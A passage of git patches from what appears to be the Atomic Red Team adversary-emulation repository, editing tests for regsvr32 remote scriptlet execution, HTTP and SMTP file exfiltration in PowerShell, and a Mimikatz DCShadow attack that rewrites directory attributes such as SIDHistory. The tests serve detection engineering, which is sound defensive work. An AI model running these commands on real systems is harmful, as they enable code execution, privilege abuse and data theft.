hosted sct file type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe executor: command: | - regsvr32.exe /s /u /i:#{url} scrobj.dll + #{regsvr32path}\#{regsvr32name} /s /u /i:#{url} scrobj.dll name: command_prompt - name: Regsvr32 local DLL execution @@ -54,6 +70,14 @@ atomic_tests: description: Name of DLL to Execute, DLL Should export DllRegisterServer type: Path default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe dependency_executor_name: powershell dependencies: - description: | @@ -65,7 +89,7 @@ atomic_tests: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: command: | - IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} ) + IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{regsvr32path}\#{regsvr32name} ) name: command_prompt - name: Regsvr32 Registering Non DLL @@ -81,6 +105,14 @@ atomic_tests: description: Path to renamed dll file to be registered type: Path default: '%temp%\shell32.jpg' + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe dependency_executor_name: command_prompt dependencies: # (optional) - description: | @@ -93,6 +125,6 @@ atomic_tests: name: command_prompt elevation_required: false command: | - regsvr32 /s #{dll_file} + #{regsvr32path}\#{regsvr32name} /s #{dll_file} cleanup_command: | - regsvr32 /U /s #{dll_file} + #{regsvr32path}\#{regsvr32name} /U /s #{dll_file} From c21c1ba13ed1cbda15d95640da11e094265b278a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 8 Jan 2021 16:23:16 +0000 Subject: [PATCH 065/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 50 +++++++++++++++++++++++++--------- atomics/T1218.010/T1218.010.md | 18 ++++++++---- 2 files changed, 50 insertions(+), 18 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index bce5af38..b7bb122c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -37564,6 +37564,14 @@ defense-evasion: description: Name of the local file, include path. type: Path default: PathToAtomicsFolder\T1218.010\src\RegSvr32.sct + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe dependency_executor_name: powershell dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#{filename}) @@ -37576,9 +37584,7 @@ defense-evasion: New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}" executor: - command: 'regsvr32.exe /s /u /i:#{filename} scrobj.dll - -' + command: "#{regsvr32path}\\#{regsvr32name} /s /u /i:#{filename} scrobj.dll\n" name: command_prompt - name: Regsvr32 remote COM scriptlet execution auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 @@ -37592,10 +37598,16 @@ defense-evasion: description: URL to hosted sct file type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe executor: - command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll - -' + command: "#{regsvr32path}\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n" name: command_prompt - name: Regsvr32 local DLL execution auto_generated_guid: '08ffca73-9a3d-471a-aeb0-68b4aa3ab37b' @@ -37610,6 +37622,14 @@ defense-evasion: description: Name of DLL to Execute, DLL Should export DllRegisterServer type: Path default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe dependency_executor_name: powershell dependencies: - description: 'AllTheThingsx86.dll must exist on disk at specified location @@ -37624,7 +37644,7 @@ defense-evasion: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe - /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} ) + /s #{dll_name}) ELSE ( regsvr32.exe /s #{regsvr32path}\#{regsvr32name} ) ' name: command_prompt @@ -37641,6 +37661,14 @@ defense-evasion: description: Path to renamed dll file to be registered type: Path default: "%temp%\\shell32.jpg" + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe dependency_executor_name: command_prompt dependencies: - description: 'Test requires a renamed dll file @@ -37655,12 +37683,8 @@ defense-evasion: executor: name: command_prompt elevation_required: false - command: 'regsvr32 /s #{dll_file} - -' - cleanup_command: 'regsvr32 /U /s #{dll_file} - -' + command: "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n" + cleanup_command: "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n" T1036.003: technique: external_references: diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index ab4c7ae5..61e97833 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -31,13 +31,15 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr | Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1218.010\src\RegSvr32.sct| +| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| +| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -regsvr32.exe /s /u /i:#{filename} scrobj.dll +#{regsvr32path}\#{regsvr32name} /s /u /i:#{filename} scrobj.dll ``` @@ -74,13 +76,15 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct| +| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| +| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -regsvr32.exe /s /u /i:#{url} scrobj.dll +#{regsvr32path}\#{regsvr32name} /s /u /i:#{url} scrobj.dll ``` @@ -103,13 +107,15 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll| +| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| +| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} ) +IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{regsvr32path}\#{regsvr32name} ) ``` @@ -145,18 +151,20 @@ Replicating observed Gozi maldoc behavior registering a dll with an altered exte | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_file | Path to renamed dll file to be registered | Path | %temp%\shell32.jpg| +| regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| +| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -regsvr32 /s #{dll_file} +#{regsvr32path}\#{regsvr32name} /s #{dll_file} ``` #### Cleanup Commands: ```cmd -regsvr32 /U /s #{dll_file} +#{regsvr32path}\#{regsvr32name} /U /s #{dll_file} ``` From 42472533faf686b1c7125a85c0952197544fa002 Mon Sep 17 00:00:00 2001 From: Itamar Date: Fri, 8 Jan 2021 18:41:50 +0200 Subject: [PATCH 066/131] Update T1048.003.yaml (#1357) Hi, I added two atomic tests for exfiltration using HTTP and SMTP. 1. Exfiltration Over Alternative Protocol - HTTP 2. Exfiltration Over Alternative Protocol - SMTP Itamar Co-authored-by: Carrie Roberts --- atomics/T1048.003/T1048.003.yaml | 47 ++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml index d66c4706..216006f0 100644 --- a/atomics/T1048.003/T1048.003.yaml +++ b/atomics/T1048.003/T1048.003.yaml @@ -67,3 +67,50 @@ atomic_tests: cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r name: manual +- name: Exfiltration Over Alternative Protocol - HTTP + description: | + Exfiltration of specified file over HTTP. + Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + supported_platforms: + - windows + executor: + command: | + $content = Get-Content #{input_file} + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content + name: powershell + input_arguments: + input_file: + description: Path to file to exfiltrate + type: Path + default: C:\Windows\System32\notepad.exe + ip_address: + description: Destination IP address where the data should be sent + type: String + default: http://127.0.0.1 +- name: Exfiltration Over Alternative Protocol - SMTP + description: | + Exfiltration of specified file over SMTP. + Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + supported_platforms: + - windows + executor: + command: | + Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} + name: powershell + input_arguments: + input_file: + description: Path to file to exfiltrate + type: Path + default: C:\Windows\System32\notepad.exe + sender: + description: The email address of the sender + type: String + default: "test@corp.com" + receiver: + description: The email address of the receiver + type: String + default: "test@corp.com" + smtp_server: + description: SMTP server to use for email transportation + type: String + default: "127.0.0.1" From 79f6986b1ad6b6d13098392a84e3fe23f5602f79 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 8 Jan 2021 16:42:19 +0000 Subject: [PATCH 067/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1048.003/T1048.003.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml index 216006f0..a191cb14 100644 --- a/atomics/T1048.003/T1048.003.yaml +++ b/atomics/T1048.003/T1048.003.yaml @@ -68,6 +68,7 @@ atomic_tests: cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r name: manual - name: Exfiltration Over Alternative Protocol - HTTP + auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c description: | Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. @@ -88,6 +89,7 @@ atomic_tests: type: String default: http://127.0.0.1 - name: Exfiltration Over Alternative Protocol - SMTP + auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 description: | Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f13e1a9e..1ef686ab 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -650,3 +650,5 @@ f14d956a-5b6e-4a93-847f-0c415142f07d c2969434-672b-4ec8-8df0-bbb91f40e250 7db7a7f9-9531-4840-9b30-46220135441c a19ee671-ed98-4e9d-b19c-d1954a51585a +6aa58451-1121-4490-a8e9-1dada3f1c68c +ec3a835e-adca-4c7c-88d2-853b69c11bb9 From 96f61076f97ddee5996300a4e75e3c1b83eabf1f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 8 Jan 2021 16:42:27 +0000 Subject: [PATCH 068/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 51 ++++++++++++++ atomics/T1048.003/T1048.003.md | 69 +++++++++++++++++++ 6 files changed, 128 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index a0454d4d..c1f6cbc1 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -785,6 +785,8 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual +exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell +exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cc6a88a4..c1bcace7 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -550,6 +550,8 @@ execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process, execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell +exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell +exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index dac4c811..9fe88826 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1478,6 +1478,8 @@ - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux] - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows] - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux] + - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows] + - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows] - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 817d3cce..25ff7cac 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1023,6 +1023,8 @@ - T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows] + - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows] + - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows] - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b7bb122c..044e72a5 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60763,6 +60763,57 @@ exfiltration: output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1 | sort | uniq | xxd -p -r\n" name: manual + - name: Exfiltration Over Alternative Protocol - HTTP + auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c + description: | + Exfiltration of specified file over HTTP. + Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + supported_platforms: + - windows + executor: + command: | + $content = Get-Content #{input_file} + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content + name: powershell + input_arguments: + input_file: + description: Path to file to exfiltrate + type: Path + default: C:\Windows\System32\notepad.exe + ip_address: + description: Destination IP address where the data should be sent + type: String + default: http://127.0.0.1 + - name: Exfiltration Over Alternative Protocol - SMTP + auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 + description: | + Exfiltration of specified file over SMTP. + Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + supported_platforms: + - windows + executor: + command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 + Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} + +' + name: powershell + input_arguments: + input_file: + description: Path to file to exfiltrate + type: Path + default: C:\Windows\System32\notepad.exe + sender: + description: The email address of the sender + type: String + default: test@corp.com + receiver: + description: The email address of the receiver + type: String + default: test@corp.com + smtp_server: + description: SMTP server to use for email transportation + type: String + default: 127.0.0.1 T1567: technique: external_references: diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md index 24e8c2e9..7a658ca8 100644 --- a/atomics/T1048.003/T1048.003.md +++ b/atomics/T1048.003/T1048.003.md @@ -12,6 +12,10 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi - [Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-3---exfiltration-over-alternative-protocol---dns) +- [Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-4---exfiltration-over-alternative-protocol---http) + +- [Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP](#atomic-test-5---exfiltration-over-alternative-protocol---smtp) +
@@ -108,4 +112,69 @@ Exfiltration of specified file over DNS protocol. +
+
+ +## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP +Exfiltration of specified file over HTTP. +Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| +| ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$content = Get-Content #{input_file} +Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content +``` + + + + + + +
+
+ +## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP +Exfiltration of specified file over SMTP. +Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| +| sender | The email address of the sender | String | test@corp.com| +| receiver | The email address of the receiver | String | test@corp.com| +| smtp_server | SMTP server to use for email transportation | String | 127.0.0.1| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} +``` + + + + + +
From 18087c9ad85424eb9ccb0f3181aff8c53e80027e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Fri, 8 Jan 2021 17:50:18 +0100 Subject: [PATCH 069/131] Add DCShadow args for attribute and value (#1362) It gives more choice in what to change instead of fixed "badpwdcount" and "9999" Also rename "user" to "object" as it is more generic than only user objects --- atomics/T1207/T1207.yaml | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index cc46cb0f..3fbd337d 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml @@ -17,10 +17,18 @@ atomic_tests: supported_platforms: - windows input_arguments: - user: - description: Targeted user (for machine account do not forget to add final '$') + object: + description: Targeted object (for machine account do not forget to add final '$') type: string - default: CLIENT1$ + default: bruce.wayne + attribute: + description: "Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory..." + type: string + default: badpwdcount + value: + description: Value to assign to object attribute + type: string + default: 9999 mimikatz_path: description: Mimikatz windows executable type: path @@ -58,7 +66,7 @@ atomic_tests: # starting fake DC server, as SYSTEM (required) $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" Remove-Item $dc_output_file -ErrorAction Ignore - $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" + $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`"" $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" # wait for fake DC server to be ready... @@ -72,6 +80,7 @@ atomic_tests: Write-Host "`nOutput from fake DC server:" Get-Content $dc_output_file + Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it Remove-Item $dc_output_file -ErrorAction Ignore Write-Host "End of DCShadow" From 9c1f9f733cf4d86ead3022e62fe034d5a42c7879 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 8 Jan 2021 16:51:05 +0000 Subject: [PATCH 070/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 18 ++++++++++++++---- atomics/T1207/T1207.md | 7 +++++-- 2 files changed, 19 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 044e72a5..8f7cce9c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -38149,11 +38149,20 @@ defense-evasion: supported_platforms: - windows input_arguments: - user: - description: Targeted user (for machine account do not forget to add final + object: + description: Targeted object (for machine account do not forget to add final '$') type: string - default: CLIENT1$ + default: bruce.wayne + attribute: + description: 'Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, + SIDHistory...' + type: string + default: badpwdcount + value: + description: Value to assign to object attribute + type: string + default: 9999 mimikatz_path: description: Mimikatz windows executable type: path @@ -38196,7 +38205,7 @@ defense-evasion: # starting fake DC server, as SYSTEM (required) $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" Remove-Item $dc_output_file -ErrorAction Ignore - $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" + $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`"" $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" # wait for fake DC server to be ready... @@ -38210,6 +38219,7 @@ defense-evasion: Write-Host "`nOutput from fake DC server:" Get-Content $dc_output_file + Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it Remove-Item $dc_output_file -ErrorAction Ignore Write-Host "End of DCShadow" diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index 83588369..8d3ae33f 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -33,7 +33,9 @@ The easiest is to run elevated and as a Domain Admin user. #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| user | Targeted user (for machine account do not forget to add final '$') | string | CLIENT1$| +| object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne| +| attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount| +| value | Value to assign to object attribute | string | 9999| | mimikatz_path | Mimikatz windows executable | path | $env:TEMP\mimikatz\x64\mimikatz.exe| | psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe| @@ -45,7 +47,7 @@ The easiest is to run elevated and as a Domain Admin user. # starting fake DC server, as SYSTEM (required) $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" Remove-Item $dc_output_file -ErrorAction Ignore -$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" +$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`"" $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" # wait for fake DC server to be ready... @@ -59,6 +61,7 @@ Wait-Process $dc Write-Host "`nOutput from fake DC server:" Get-Content $dc_output_file +Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it Remove-Item $dc_output_file -ErrorAction Ignore Write-Host "End of DCShadow" From fa7f19ad7f6d6524668aae083982a9031897a015 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Sun, 10 Jan 2021 21:30:57 -0600 Subject: [PATCH 071/131] Update T1218.010.yaml (#1364) Fix typo in command to avoid errors --- atomics/T1218.010/T1218.010.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218.010/T1218.010.yaml b/atomics/T1218.010/T1218.010.yaml index 809290a5..9fab6f02 100644 --- a/atomics/T1218.010/T1218.010.yaml +++ b/atomics/T1218.010/T1218.010.yaml @@ -89,7 +89,7 @@ atomic_tests: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: command: | - IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{regsvr32path}\#{regsvr32name} ) + IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) name: command_prompt - name: Regsvr32 Registering Non DLL From 371eb3d6095a93e3dcb77607ed424426dd7a5db0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 11 Jan 2021 03:40:28 +0000 Subject: 